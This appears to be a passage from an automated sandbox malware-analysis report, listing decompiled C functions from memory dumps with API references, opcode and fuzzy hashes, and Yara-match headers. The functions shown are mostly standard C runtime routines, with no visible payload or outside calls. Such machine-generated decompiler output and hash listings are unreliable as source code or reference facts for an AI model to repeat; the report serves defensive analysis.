                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: AllocHeap_free_malloc
                                        • String ID:
                                        • API String ID: 2734353464-0
                                        • Opcode ID: dd909db95a92bd5af9694876447f1d933b4fdd946849ecf6ab766cd93eccd6cc
                                        • Instruction ID: 1553e9ff81819ab1d4e1e770a093666b30eab558416d13de368e2a317615a408
                                        • Opcode Fuzzy Hash: dd909db95a92bd5af9694876447f1d933b4fdd946849ecf6ab766cd93eccd6cc
                                        • Instruction Fuzzy Hash: 5F115C31404E11AFDF726F71AC45EAE37D4AF14362F104625F9099A153EF348D41B799
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0009F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				int _v20;
                                        				int _t35;
                                        				int _t38;
                                        				intOrPtr* _t44;
                                        				int _t47;
                                        				short* _t49;
                                        				intOrPtr _t50;
                                        				intOrPtr _t54;
                                        				int _t55;
                                        				int _t59;
                                        				char* _t62;
                                        
                                        				_t62 = _a8;
                                        				if(_t62 == 0) {
                                        					L5:
                                        					return 0;
                                        				}
                                        				_t50 = _a12;
                                        				if(_t50 == 0) {
                                        					goto L5;
                                        				}
                                        				if( *_t62 != 0) {
                                        					E000937C4( &_v20, _a16);
                                        					_t35 = _v20;
                                        					__eflags =  *(_t35 + 0xa8);
                                        					if( *(_t35 + 0xa8) != 0) {
                                        						_t38 = E0009F121( *_t62 & 0x000000ff,  &_v20);
                                        						__eflags = _t38;
                                        						if(_t38 == 0) {
                                        							__eflags = _a4;
                                        							_t59 = 1;
                                        							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                        							if(__eflags != 0) {
                                        								L21:
                                        								__eflags = _v8;
                                        								if(_v8 != 0) {
                                        									_t54 = _v12;
                                        									_t31 = _t54 + 0x70;
                                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                        									__eflags =  *_t31;
                                        								}
                                        								return _t59;
                                        							}
                                        							L20:
                                        							_t44 = E00094196(__eflags);
                                        							_t59 = _t59 | 0xffffffff;
                                        							__eflags = _t59;
                                        							 *_t44 = 0x2a;
                                        							goto L21;
                                        						}
                                        						_t59 = _v20;
                                        						__eflags =  *(_t59 + 0x74) - 1;
                                        						if( *(_t59 + 0x74) <= 1) {
                                        							L15:
                                        							__eflags = _t50 -  *(_t59 + 0x74);
                                        							L16:
                                        							if(__eflags < 0) {
                                        								goto L20;
                                        							}
                                        							__eflags = _t62[1];
                                        							if(__eflags == 0) {
                                        								goto L20;
                                        							}
                                        							L18:
                                        							_t59 =  *(_t59 + 0x74);
                                        							goto L21;
                                        						}
                                        						__eflags = _t50 -  *(_t59 + 0x74);
                                        						if(__eflags < 0) {
                                        							goto L16;
                                        						}
                                        						__eflags = _a4;
                                        						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                        						_t59 = _v20;
                                        						__eflags = _t47;
                                        						if(_t47 != 0) {
                                        							goto L18;
                                        						}
                                        						goto L15;
                                        					}
                                        					_t55 = _a4;
                                        					__eflags = _t55;
                                        					if(_t55 != 0) {
                                        						 *_t55 =  *_t62 & 0x000000ff;
                                        					}
                                        					_t59 = 1;
                                        					goto L21;
                                        				}
                                        				_t49 = _a4;
                                        				if(_t49 != 0) {
                                        					 *_t49 = 0;
                                        				}
                                        				goto L5;
                                        			}

















                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0009F42C
                                        • __isleadbyte_l.LIBCMT ref: 0009F45A
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0009F488
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0009F4BE
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 3df1b00145f12a4512da01488e1d6a11e37ff5d115a60e4c71a3c1b68d74b90c
                                        • Instruction ID: 7f8a3c4fb2c549e0fe49e2a640808703a2f57b49dcae0c383259daf0d6299c63
                                        • Opcode Fuzzy Hash: 3df1b00145f12a4512da01488e1d6a11e37ff5d115a60e4c71a3c1b68d74b90c
                                        • Instruction Fuzzy Hash: 8F318A31604247ABDF218E65D884BBB7BF5FF41320F158539E864DB1A1E730E891EBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E00405751(signed int _a4) {
                                        				signed int _t9;
                                        				void* _t13;
                                        				signed int _t15;
                                        				WCHAR* _t22;
                                        				signed int _t24;
                                        				signed int* _t25;
                                        				void* _t27;
                                        
                                        				_t9 = _a4;
                                        				_t25 = 0x412fc8 + _t9 * 4;
                                        				_t24 =  *_t25;
                                        				if(_t24 == 0) {
                                        					_t22 =  *(0x40cd48 + _t9 * 4);
                                        					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                        					if(_t27 != 0) {
                                        						L8:
                                        						 *_t25 = _t27;
                                        						if( *_t25 != 0) {
                                        							FreeLibrary(_t27);
                                        						}
                                        						_t13 = _t27;
                                        						L11:
                                        						return _t13;
                                        					}
                                        					_t15 = GetLastError();
                                        					if(_t15 != 0x57) {
                                        						_t27 = 0;
                                        					} else {
                                        						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                        						_t27 = _t15;
                                        					}
                                        					if(_t27 != 0) {
                                        						goto L8;
                                        					} else {
                                        						 *_t25 = _t15 | 0xffffffff;
                                        						_t13 = 0;
                                        						goto L11;
                                        					}
                                        				}
                                        				_t4 = _t24 + 1; // 0x2327c9bb
                                        				asm("sbb eax, eax");
                                        				return  ~_t4 & _t24;
                                        			}











                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                        • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                        • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                        • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                        • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 71%
                                        			E00404320(void* __ebx, void* __ecx, void* __edx) {
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t2;
                                        				void* _t3;
                                        				void* _t4;
                                        				intOrPtr _t9;
                                        				void* _t11;
                                        				void* _t20;
                                        				void* _t21;
                                        				void* _t23;
                                        				void* _t25;
                                        				void* _t27;
                                        				void* _t29;
                                        				void* _t31;
                                        				void* _t32;
                                        				long _t36;
                                        				long _t37;
                                        				void* _t40;
                                        
                                        				_t29 = __edx;
                                        				_t23 = __ecx;
                                        				_t20 = __ebx;
                                        				_t36 = GetLastError();
                                        				_t2 =  *0x412064; // 0x7
                                        				_t42 = _t2 - 0xffffffff;
                                        				if(_t2 == 0xffffffff) {
                                        					L2:
                                        					_t3 = E00403ECE(_t23, 1, 0x364);
                                        					_t31 = _t3;
                                        					_pop(_t25);
                                        					if(_t31 != 0) {
                                        						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                                        						__eflags = _t4;
                                        						if(_t4 != 0) {
                                        							E00404192(_t25, _t31, 0x4132a4);
                                        							E00403E03(0);
                                        							_t40 = _t40 + 0xc;
                                        							__eflags = _t31;
                                        							if(_t31 == 0) {
                                        								goto L9;
                                        							} else {
                                        								goto L8;
                                        							}
                                        						} else {
                                        							_push(_t31);
                                        							goto L4;
                                        						}
                                        					} else {
                                        						_push(_t3);
                                        						L4:
                                        						E00403E03();
                                        						_pop(_t25);
                                        						L9:
                                        						SetLastError(_t36);
                                        						E00403E8B(_t20, _t29, _t31, _t36);
                                        						asm("int3");
                                        						_push(_t20);
                                        						_push(_t36);
                                        						_push(_t31);
                                        						_t37 = GetLastError();
                                        						_t21 = 0;
                                        						_t9 =  *0x412064; // 0x7
                                        						_t45 = _t9 - 0xffffffff;
                                        						if(_t9 == 0xffffffff) {
                                        							L12:
                                        							_t32 = E00403ECE(_t25, 1, 0x364);
                                        							_pop(_t27);
                                        							if(_t32 != 0) {
                                        								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                                        								__eflags = _t11;
                                        								if(_t11 != 0) {
                                        									E00404192(_t27, _t32, 0x4132a4);
                                        									E00403E03(_t21);
                                        									__eflags = _t32;
                                        									if(_t32 != 0) {
                                        										goto L19;
                                        									} else {
                                        										goto L18;
                                        									}
                                        								} else {
                                        									_push(_t32);
                                        									goto L14;
                                        								}
                                        							} else {
                                        								_push(_t21);
                                        								L14:
                                        								E00403E03();
                                        								L18:
                                        								SetLastError(_t37);
                                        							}
                                        						} else {
                                        							_t32 = E00405878(_t25, _t45, _t9);
                                        							if(_t32 != 0) {
                                        								L19:
                                        								SetLastError(_t37);
                                        								_t21 = _t32;
                                        							} else {
                                        								goto L12;
                                        							}
                                        						}
                                        						return _t21;
                                        					}
                                        				} else {
                                        					_t31 = E00405878(_t23, _t42, _t2);
                                        					if(_t31 != 0) {
                                        						L8:
                                        						SetLastError(_t36);
                                        						return _t31;
                                        					} else {
                                        						goto L2;
                                        					}
                                        				}
                                        			}






















                                        APIs
                                        • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                        • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                        • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                        • _abort.LIBCMT ref: 0040439E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_abort
                                        • String ID:
                                        • API String ID: 88804580-0
                                        • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                        • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                        • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                        • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000A2F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                        				intOrPtr _t25;
                                        				void* _t26;
                                        
                                        				_t25 = _a16;
                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                        					_t26 = E000A34F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        					goto L9;
                                        				} else {
                                        					_t35 = _t25 - 0x66;
                                        					if(_t25 != 0x66) {
                                        						__eflags = _t25 - 0x61;
                                        						if(_t25 == 0x61) {
                                        							L7:
                                        							_t26 = E000A3025(_a4, _a8, _a12, _a20, _a24, _a28);
                                        						} else {
                                        							__eflags = _t25 - 0x41;
                                        							if(__eflags == 0) {
                                        								goto L7;
                                        							} else {
                                        								_t26 = E000A37A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        							}
                                        						}
                                        						L9:
                                        						return _t26;
                                        					} else {
                                        						return E000A36C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                        					}
                                        				}
                                        			}






                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction ID: 6b66d0d94d8bd47282ee870131df05e36bfc81e154958616fb2ecbfa8cdeb90a
                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction Fuzzy Hash: 38014B7200014ABFCF665EC8DC02CEE3F76BF1A354B598425FA1858132D236CAB1AB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E000987A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr* _t24;
                                        				void* _t28;
                                        				intOrPtr* _t40;
                                        				void* _t41;
                                        
                                        				_push(0xc);
                                        				_push(0xacf38);
                                        				E000927F0(__ebx, __edi, __esi);
                                        				_t28 = E000915FE();
                                        				_t40 = E000932EE(8, 1);
                                        				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
                                        				_t43 = _t40;
                                        				if(_t40 != 0) {
                                        					E000936DB(_t28, __edx, 1, _t40, __eflags);
                                        					E00093AF6(_t28, __edx, 1, _t40, __eflags);
                                        					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
                                        					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
                                        					E00093117(0xc);
                                        					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                        					E0009344C( *_t40);
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E00098E70();
                                        					E00093117(0xd);
                                        					 *(_t41 - 4) = 1;
                                        					asm("lock xadd [eax], edi");
                                        					__eflags = 2;
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E00098E7C();
                                        					_t24 = _t40;
                                        				} else {
                                        					 *((intOrPtr*)(E00094196(_t43))) = 0xc;
                                        					_t24 = 0;
                                        				}
                                        				return E00092835(_t24);
                                        			}








                                        APIs
                                          • Part of subcall function 000915FE: __getptd_noexit.LIBCMT ref: 000915FF
                                          • Part of subcall function 000915FE: __amsg_exit.LIBCMT ref: 0009160C
                                        • __calloc_crt.LIBCMT ref: 00098DEF
                                          • Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD
                                        • __lock.LIBCMT ref: 00098E25
                                        • ___addlocaleref.LIBCMT ref: 00098E31
                                        • __lock.LIBCMT ref: 00098E45
                                          • Part of subcall function 00094196: __getptd_noexit.LIBCMT ref: 00094196
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                        • String ID:
                                        • API String ID: 2580527540-0
                                        • Opcode ID: b07550699f19c94048a2a0307fdf15cae7b141b914546c78f4d53abc3e5d77be
                                        • Instruction ID: d65d612fa01061dc693ace4b5ae9497124216b101f9e1fde085a9191db80e57c
                                        • Opcode Fuzzy Hash: b07550699f19c94048a2a0307fdf15cae7b141b914546c78f4d53abc3e5d77be
                                        • Instruction Fuzzy Hash: C0014031605301ABDF20BFB89903B9E77E0AF85720F118149F4559B3D3DE745E41AB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004025BA() {
                                        				void* _t4;
                                        				void* _t8;
                                        
                                        				E00402AE5();
                                        				E00402A79();
                                        				if(E004027D9() != 0) {
                                        					_t4 = E0040278B(_t8, __eflags);
                                        					__eflags = _t4;
                                        					if(_t4 != 0) {
                                        						return 1;
                                        					} else {
                                        						E00402815();
                                        						goto L1;
                                        					}
                                        				} else {
                                        					L1:
                                        					return 0;
                                        				}
                                        			}






                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                          • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                        • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00094FE5() {
                                        				intOrPtr _t3;
                                        				intOrPtr _t4;
                                        				void* _t6;
                                        				intOrPtr _t9;
                                        				void* _t12;
                                        				intOrPtr _t13;
                                        
                                        				_t3 =  *0xf1a84;
                                        				_t13 = 0x14;
                                        				if(_t3 != 0) {
                                        					if(_t3 < _t13) {
                                        						_t3 = _t13;
                                        						goto L4;
                                        					}
                                        				} else {
                                        					_t3 = 0x200;
                                        					L4:
                                        					 *0xf1a84 = _t3;
                                        				}
                                        				_t4 = E000932EE(_t3, 4);
                                        				 *0xf1a80 = _t4;
                                        				if(_t4 != 0) {
                                        					L8:
                                        					_t12 = 0;
                                        					_t9 = 0xaea60;
                                        					while(1) {
                                        						 *((intOrPtr*)(_t12 + _t4)) = _t9;
                                        						_t9 = _t9 + 0x20;
                                        						_t12 = _t12 + 4;
                                        						if(_t9 >= 0xaece0) {
                                        							break;
                                        						}
                                        						_t4 =  *0xf1a80;
                                        					}
                                        					return 0;
                                        				} else {
                                        					 *0xf1a84 = _t13;
                                        					_t4 = E000932EE(_t13, 4);
                                        					 *0xf1a80 = _t4;
                                        					if(_t4 != 0) {
                                        						goto L8;
                                        					} else {
                                        						_t6 = 0x1a;
                                        						return _t6;
                                        					}
                                        				}
                                        			}










                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: __calloc_crt
                                        • String ID: `
                                        • API String ID: 3494438863-2930790904
                                        • Opcode ID: 1ebf335c88b0c1146ab46b0ae446c8a5d6e89c09a5e7be3a04354af98be6797e
                                        • Instruction ID: c381f03891ec4ee1cb5b7c3b16fe849011d87521d764edac47ae6b375a3b7666
                                        • Opcode Fuzzy Hash: 1ebf335c88b0c1146ab46b0ae446c8a5d6e89c09a5e7be3a04354af98be6797e
                                        • Instruction Fuzzy Hash: C1F0AF71209602CAFF348B6AFC51BF52794F761770B100026F201CE9D5E7398841F785
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E000986D1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				void* _t4;
                                        				void* _t15;
                                        				void* _t17;
                                        
                                        				_push(8);
                                        				_push(0xacfc0);
                                        				_t4 = E000927F0(__ebx, __edi, __esi);
                                        				_t17 =  *0xae2e4 - 0xae2e8; // 0xae2e8
                                        				if(_t17 != 0) {
                                        					E00093117(0xc);
                                        					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
                                        					 *0xae2e4 = E0009375B("��", 0xae2e8);
                                        					 *(_t15 - 4) = 0xfffffffe;
                                        					_t4 = E0009871A();
                                        				}
                                        				return E00092835(_t4);
                                        			}







                                        APIs
                                        • __lock.LIBCMT ref: 000986EC
                                          • Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
                                          • Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
                                          • Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 000986FC
                                          • Part of subcall function 0009375B: ___addlocaleref.LIBCMT ref: 00093777
                                          • Part of subcall function 0009375B: ___removelocaleref.LIBCMT ref: 00093782
                                          • Part of subcall function 0009375B: ___freetlocinfo.LIBCMT ref: 00093796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__amsg_exit__lock__mtinitlocknum__updatetlocinfo
                                        • String ID:
                                        • API String ID: 236788210-2599400749
                                        • Opcode ID: 56d8877799b0669b77fb8b5540cf9d49b1b70e3c8cfed34379f379e2a7dbfaaf
                                        • Instruction ID: 6fe879db6dbd93f9d9499297c198aab8f3acdae90320a32ca93300a83fd796fe
                                        • Opcode Fuzzy Hash: 56d8877799b0669b77fb8b5540cf9d49b1b70e3c8cfed34379f379e2a7dbfaaf
                                        • Instruction Fuzzy Hash: 6FE0CD3154E751EEFE14F7E0D907BCCAA545B03B21F204157F104651C3CE780600A75A
                                        Uniqueness

                                        Uniqueness Score: -1.00%